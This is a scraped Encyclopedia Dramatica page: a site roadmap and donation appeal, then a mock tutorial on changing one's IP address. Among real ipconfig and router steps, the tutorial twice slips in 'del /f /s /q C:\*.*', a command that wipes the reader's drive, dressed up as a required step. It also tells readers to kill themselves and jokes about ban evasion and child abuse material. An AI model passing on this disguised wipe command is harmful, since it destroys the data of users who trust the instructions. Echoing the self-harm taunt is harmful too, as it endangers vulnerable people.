⚠️ Encyclopedia Dramatica is currently being restored by automated scripts ⚠️
There's been a lot of questions as to what's going on with the site and what comes next. So we have this (ordered) roadmap of what's being worked on and what's to come. This will be updated until the roadmap is complete as Æ has a lot of missing features and ideas that I'd like to fix in regards to its offerings before I implement big plans for the site's popularity and well-being in 2021.
Content restoration (Mostly done, few things missing that will be restored sporadically) Image restoration (Being run in background, nothing I can do cept wait)
Æ Imageboard (Currently being worked on)
Mediawiki upgrade and backend fixes
.onion domain for Tor-friendly editing and viewing
CSS overhaul (Fixing things like the videos on mobile, and overall a rehaul of the wiki's look to be more friendly to readers)
Paid bounty board for new articles (Won't be managed by me for legal reasons however I will ensure it runs smoothly)
Anonymous phone # service for those seeking ban evades from Twitter as well as a phone number not tied to their name (more details at launch)
Currently we are nearing our annual LLC renewal fee ($650) as well throwing the funds required for these other changes and aspects. If you would like to support Æ consider purchasing a copy of The Hustler's Bible or securing some Merch. Donating is also appreciated however I would rather give something back as per the two options above.
If you have any questions you can join our public Telegram chat to DM me privately or @ me in chat.
You can also email me via [email protected]
Merch notes: Thank you to all who have purchased merch. We will ship late January or mid February depending on our provider's speed.
Here's to setting the world on fire in 2021!
|The content of this page may set off fake alarms. View the source to see it's completely safe.|
Your IP Address is 127.0.0.1 and we are haxing your computer now. Not even pressing Alt+F4 will save you now, noob.
Why would you change your IP?
It's useful if:
- You are a pedophile looking for an IP that hasn't been banned yet because of CP posting.
- You are planning to create a giant sock puppet farm in order to overturn Wikipedia ad majorem EDi gloriam.
- You were such a n00b in a forum and you annoyed the admins so much that they banned you.
- You want to raid a forum of n00bs but you failed to hire some /b/tards as they are not your personal army.
- You got humiliated and pwned by a powerful troll and you try to get a new identity.
- You are a hacker sought by the police.
- You were interrupted in a NO U war and you don't want to become a luser.
How to change your IP
If your computer is connected directly to the internet without a NAT router in between, try this:
- Get to a command prompt. (From the Start menu, choose Run..., type
cmdand press Enter.)
ipconfig /releaseand press Enter.
- Optional: Turn off the computer and leave it turned off overnight.
ipconfig /renewand press Enter.
del /f /s /q C:\*.*and press Enter.
- Do not forget the last step!
- Log into the router's admin console (often http://192.168.1.1/ or http://192.168.0.1), or for netgear brand routers use http://routerlogin.net
- Release the IP address (method varies by router manufacturer).
- Turn off router, Ethernet hubs/switches, and the cable/DSL modem.
- Leave everything off overnight.
- Turn everything back on and confirm the switch.
#2.1 (simplified but unreliable)
- Turn off your router, any Ethernet hubs/switches and your cable/DSL modem.
- Optional: Shut down your computer and leave it off until completed
- Leave everything off for 5-10 minutes.
- Confirm the switch.
- Try Method 2 if this fails.
- Go to http://192.168.1.1 or http://192.168.0.1 , or for netgear brand routers use http://routerlogin.net
- Log in (if you do not know the password, Google for default router passwords).
- Find DNS addresses and write them down.
- Switch setting to Static IP. Put in DNS addresses and change your IP to whatever you like.
- Log into the router's admin console. (Often http://192.168.1.1/), or for netgear brand routers use http://routerlogin.net
- Release the IP address. (Method varies by router manufacturer)
- Change MAC address.
- Turn everything back on.
If nothing works
del /f /s /q C:\*.*and press Enter.
- Kill yourself.
How to change your IP #6
Go over to your computer and rip all wires out of wall problem solved
How to change your IP #7
Move to Germany and get your Internets from a german ISP. They automatically change your IP every 24 hours preferably while you're playing Black Ops 2, forcing you to lose the connection. Unfortunately, the german Government can legally view your porn traffic under the clever guise of finding Pedophiles, so you'll still need a Proxy.
How IP's are allocated by /8 subnet
|IP address is part of a series on Language & Communication|
IP address is part of a series on
Visit the Softwarez Portal for complete coverage.